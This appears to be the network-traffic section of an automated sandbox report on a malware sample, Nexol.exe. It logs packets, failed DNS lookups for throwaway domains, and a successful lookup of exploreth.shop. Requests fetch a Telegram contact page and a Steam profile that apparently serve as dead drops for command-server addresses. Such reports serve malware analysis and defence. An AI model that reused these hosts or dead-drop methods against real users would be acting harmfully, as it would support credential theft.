Mar 11, 2025 23:59:59.989428997 CET	443	49736	104.21.16.1	192.168.2.4
Mar 11, 2025 23:59:59.990545988 CET	49736	443	192.168.2.4	104.21.16.1
Mar 11, 2025 23:59:59.990662098 CET	49736	443	192.168.2.4	104.21.16.1
Mar 11, 2025 23:59:59.990704060 CET	443	49736	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:00.913243055 CET	443	49736	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:00.913506031 CET	443	49736	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:00.913511992 CET	49736	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:00.913563013 CET	49736	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:01.201489925 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:01.201543093 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:01.201630116 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:01.202174902 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:01.202202082 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.067428112 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.067500114 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.069004059 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.069015026 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.069340944 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.070663929 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.112329006 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.855153084 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.855205059 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.855223894 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.855236053 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.855268955 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.855298996 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.855329037 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.937352896 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.937433004 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.937527895 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.937561989 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.939181089 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.992671967 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.992724895 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.992793083 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.992822886 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.992837906 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.992908001 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.993081093 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.993081093 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:03.993120909 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:03.994579077 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:03.994621992 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:03.994708061 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:03.995039940 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:03.995057106 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:04.218003035 CET	49737	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:04.218039989 CET	443	49737	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:05.632937908 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.633045912 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.634484053 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.634496927 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.634721041 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.635965109 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.636795998 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.636846066 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.636955023 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.636995077 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637131929 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.637186050 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637317896 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.637352943 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637568951 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.637607098 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637773991 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.637804031 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637808084 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.637824059 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.637989044 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638017893 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638035059 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638056993 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638194084 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638231039 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638233900 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638247013 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638262987 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638317108 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638391018 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638443947 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638454914 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:05.638467073 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:05.638509035 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:07.742734909 CET	443	49738	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:07.743021965 CET	49738	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:07.747489929 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:07.747531891 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:07.747628927 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:07.747921944 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:07.747951031 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:09.581372023 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:09.581507921 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:09.582984924 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:09.583003044 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:09.583765984 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:09.586760044 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:09.628331900 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.400810957 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.400856018 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.400876045 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.400932074 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.401005983 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.401041031 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.401063919 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.469645977 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.469718933 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.469744921 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.469788074 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.470189095 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.539061069 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.539165974 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.539182901 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.539324999 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.539325953 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.539412975 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.539439917 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.539458036 CET	49739	443	192.168.2.4	23.210.122.61
Mar 12, 2025 00:00:10.539465904 CET	443	49739	23.210.122.61	192.168.2.4
Mar 12, 2025 00:00:10.541359901 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:10.541399002 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:10.541559935 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:10.541804075 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:10.541815996 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:12.281264067 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:12.281348944 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:12.282825947 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:12.282839060 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:12.283145905 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:12.288331985 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:12.288351059 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:12.288410902 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.048063993 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.048182964 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.048255920 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.048268080 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.048284054 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.048330069 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.048388004 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.055368900 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.055444956 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.055455923 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.058721066 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.058789015 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.058794975 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.065480947 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.065567017 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.065660000 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.065675020 CET	443	49741	104.21.16.1	192.168.2.4
Mar 12, 2025 00:00:13.065686941 CET	49741	443	192.168.2.4	104.21.16.1
Mar 12, 2025 00:00:13.065692902 CET	443	49741	104.21.16.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 23:59:21.987478018 CET	58879	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:21.994065046 CET	53	58879	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.429536104 CET	52498	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.438433886 CET	53	52498	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.440277100 CET	57940	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.448107958 CET	53	57940	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.449184895 CET	61895	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.625895023 CET	53	61895	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.627557039 CET	56882	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.636707067 CET	53	56882	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.637834072 CET	63677	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.647047997 CET	53	63677	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.648055077 CET	50002	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.656945944 CET	53	50002	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.657962084 CET	54766	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.666474104 CET	53	54766	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.667579889 CET	62946	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.676570892 CET	53	62946	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.677491903 CET	63748	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.686068058 CET	53	63748	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:24.687381029 CET	57220	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:24.694171906 CET	53	57220	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:27.439488888 CET	57915	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:27.454505920 CET	53	57915	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:30.632951975 CET	57083	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:30.640880108 CET	53	57083	1.1.1.1	192.168.2.4
Mar 11, 2025 23:59:42.105103016 CET	54983	53	192.168.2.4	1.1.1.1
Mar 11, 2025 23:59:42.112131119 CET	53	54983	1.1.1.1	192.168.2.4
Mar 12, 2025 00:00:01.191968918 CET	50199	53	192.168.2.4	1.1.1.1
Mar 12, 2025 00:00:01.200387001 CET	53	50199	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 11, 2025 23:59:21.987478018 CET	192.168.2.4	1.1.1.1	0x18f5	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.429536104 CET	192.168.2.4	1.1.1.1	0xe39c	Standard query (0)	astralconnec.icu	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.440277100 CET	192.168.2.4	1.1.1.1	0x177d	Standard query (0)	begindecafer.world	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.449184895 CET	192.168.2.4	1.1.1.1	0x1f7e	Standard query (0)	garagedrootz.top	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.627557039 CET	192.168.2.4	1.1.1.1	0x5219	Standard query (0)	modelshiverd.icu	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.637834072 CET	192.168.2.4	1.1.1.1	0x1790	Standard query (0)	arisechairedd.shop	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.648055077 CET	192.168.2.4	1.1.1.1	0xe37	Standard query (0)	catterjur.run	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.657962084 CET	192.168.2.4	1.1.1.1	0xfcfe	Standard query (0)	orangemyther.live	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.667579889 CET	192.168.2.4	1.1.1.1	0x2b1a	Standard query (0)	fostinjec.today	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.677491903 CET	192.168.2.4	1.1.1.1	0x1fae	Standard query (0)	sterpickced.digital	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.687381029 CET	192.168.2.4	1.1.1.1	0x3ebe	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.439488888 CET	192.168.2.4	1.1.1.1	0x272f	Standard query (0)	exploreth.shop	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:30.632951975 CET	192.168.2.4	1.1.1.1	0xf21c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:42.105103016 CET	192.168.2.4	1.1.1.1	0xa2ef	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 12, 2025 00:00:01.191968918 CET	192.168.2.4	1.1.1.1	0x5a03	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 11, 2025 23:59:21.994065046 CET	1.1.1.1	192.168.2.4	0x18f5	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.438433886 CET	1.1.1.1	192.168.2.4	0xe39c	Name error (3)	astralconnec.icu	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.448107958 CET	1.1.1.1	192.168.2.4	0x177d	Name error (3)	begindecafer.world	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.625895023 CET	1.1.1.1	192.168.2.4	0x1f7e	Name error (3)	garagedrootz.top	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.636707067 CET	1.1.1.1	192.168.2.4	0x5219	Name error (3)	modelshiverd.icu	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.647047997 CET	1.1.1.1	192.168.2.4	0x1790	Name error (3)	arisechairedd.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.656945944 CET	1.1.1.1	192.168.2.4	0xe37	Name error (3)	catterjur.run	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.666474104 CET	1.1.1.1	192.168.2.4	0xfcfe	Name error (3)	orangemyther.live	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.676570892 CET	1.1.1.1	192.168.2.4	0x2b1a	Name error (3)	fostinjec.today	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.686068058 CET	1.1.1.1	192.168.2.4	0x1fae	Name error (3)	sterpickced.digital	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:24.694171906 CET	1.1.1.1	192.168.2.4	0x3ebe	No error (0)	steamcommunity.com		23.210.122.61	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:27.454505920 CET	1.1.1.1	192.168.2.4	0x272f	No error (0)	exploreth.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:30.640880108 CET	1.1.1.1	192.168.2.4	0xf21c	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Mar 11, 2025 23:59:42.112131119 CET	1.1.1.1	192.168.2.4	0xa2ef	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Mar 12, 2025 00:00:01.200387001 CET	1.1.1.1	192.168.2.4	0x5a03	No error (0)	steamcommunity.com		23.210.122.61	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

steamcommunity.com

exploreth.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49717	149.154.167.99	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:23 UTC	61	OUT	GET /asdawfq HTTP/1.1 Connection: Keep-Alive Host: t.me
2025-03-11 22:59:24 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 11 Mar 2025 22:59:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12337 Connection: close Set-Cookie: stel_ssid=245cfcec735a02b04f_10615685197030817864; expires=Wed, 12 Mar 2025 22:59:24 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-03-11 22:59:24 UTC	12337	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49720	23.210.122.61	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:26 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 22:59:27 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 22:59:27 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=a0ee5993a5f77ae6ee167791; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 22:59:27 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 22:59:27 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
